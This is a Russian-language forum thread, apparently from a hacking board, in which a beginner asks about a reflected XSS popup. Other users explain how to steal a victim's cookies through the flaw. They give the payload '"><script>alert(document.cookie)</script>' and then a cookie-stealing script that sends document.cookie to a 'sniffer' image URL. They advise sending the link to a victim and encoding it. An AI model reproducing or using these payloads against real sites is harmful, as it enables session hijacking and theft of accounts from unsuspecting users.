>>Так, что это кто нить знает ?
пасвная XSS

Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?

ты чет напутал!
или скрипт нетот пихнул и незаметил...
То что на картинке - результат действия следуйщего скриптк:

Блин, да ты прав я именно этим скриптом и пробовал.
А через эту уизвимость куки можно пробивать ?

просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>

мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
ну раз спросил то отвечу - да, угнать кукисы можно

и что?

она посмотрит на свои куки=///////

ТС
кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
и жди куки)
например что то типа:
'><script>img = new Image();img.src="снифферкартинко"+d ocument.cookie;</script>

Спасибо, я тока учусь ))

только закодировать не забудь